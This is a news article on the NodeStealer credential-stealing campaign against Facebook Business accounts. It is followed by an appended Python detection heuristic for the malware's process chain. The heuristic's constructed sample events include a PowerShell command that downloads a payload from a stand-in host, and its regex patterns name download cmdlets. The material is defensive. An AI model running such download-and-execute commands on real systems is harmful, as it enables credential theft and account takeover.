An ongoing campaign is targeting Facebook Business accounts with malicious messages in an attempt to steal victims’ credentials and potentially take over their accounts. The attackers mainly focus on victims in southern Europe and North America, particularly in the manufacturing, services, and technology sectors.

The NodeStealer malware, first discovered by Meta in May 2023, is a JavaScript-based malware that steals cookies and passwords from web browsers, compromising accounts on platforms like Facebook, Gmail, and Outlook. Recently, Netskope Threat Labs revealed that Vietnamese threat actors are behind the attacks, using tactics similar to other adversaries in the same region. These attackers use fraudulent messages sent via Facebook Messenger to deliver the credential theft malware in ZIP or RAR archive files. The malware payload file disguises itself as an image of a defective product, enticing Facebook business page owners to download it. Once executed, the archive files open the Chrome web browser and redirect the victim to a benign webpage. In the background, a PowerShell command downloads additional payloads, including the Python interpreter and the NodeStealer malware.

The variant of NodeStealer used in this campaign is more advanced than previous versions, using batch files to download and execute Python scripts, stealing credentials and cookies from multiple browsers and websites. The stolen credentials and cookies can be used by the attackers to take control of Facebook accounts and carry out fraudulent transactions using legitimate business pages. This campaign may be a prelude to a more targeted attack in the future.

It is crucial for Facebook Business account owners to exercise caution and avoid downloading suspicious files or clicking on unknown links.
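Added example, not from the original article or from Netskope: a triage heuristic for the process chain described above (batch file, decoy Chrome window, background PowerShell download, Python interpreter started from a user profile). The event fields, the command-line patterns and every sample value are assumptions constructed for illustration, since the article does not give the actual command lines.

```python
import re

# Constructed process-creation events (fields modelled on Sysmon Event ID 1).
# All PIDs, paths, file names and URLs are invented for this example.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "C:\Users\a\Downloads\photo\photo.bat"'},
    {"pid": 210, "ppid": 200, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmd": "chrome.exe https://example.com/"},
    {"pid": 220, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -Command Invoke-WebRequest https://example.invalid/p.zip -OutFile p.zip"},
    {"pid": 230, "ppid": 200, "image": r"C:\Users\a\AppData\Local\Temp\py\python.exe",
     "cmd": "python.exe main.py"},
    # Benign look-alike: a build script running an installed Python.
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c build.bat"},
    {"pid": 310, "ppid": 300, "image": r"C:\Program Files\Python312\python.exe",
     "cmd": "python.exe setup.py build"},
]

ANY = re.compile("")
BATCH = re.compile(r"\.(bat|cmd)\b", re.I)
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)
USER_PATH = re.compile(r"\\users\\", re.I)  # interpreter living under a user profile

def find_chains(events):
    """Return (root_pid, signals) for batch-rooted trees that download and run Python."""
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    hits = []
    for root in events:
        if not (root["image"].lower().endswith("cmd.exe") and BATCH.search(root["cmd"])):
            continue
        seen, stack = {}, list(children.get(root["pid"], []))
        while stack:  # visit every descendant of the batch process once
            e = stack.pop()
            if e["pid"] not in seen:
                seen[e["pid"]] = e
                stack.extend(children.get(e["pid"], []))
        def has(exe, rx, field):
            return any(p["image"].lower().endswith(exe) and rx.search(p[field]) for p in seen.values())
        signals = {"decoy_browser": has("chrome.exe", ANY, "cmd"),
                   "ps_download": has("powershell.exe", DOWNLOAD, "cmd"),
                   "user_path_python": has("python.exe", USER_PATH, "image")}
        # Require the download plus at least one corroborating signal.
        if signals["ps_download"] and (signals["decoy_browser"] or signals["user_path_python"]):
            hits.append((root["pid"], sorted(k for k, v in signals.items() if v)))
    return hits

if __name__ == "__main__":
    print(find_chains(EVENTS))
```

Requiring the PowerShell download together with a second signal keeps ordinary batch-driven builds, such as the benign tree in the sample data, out of the results.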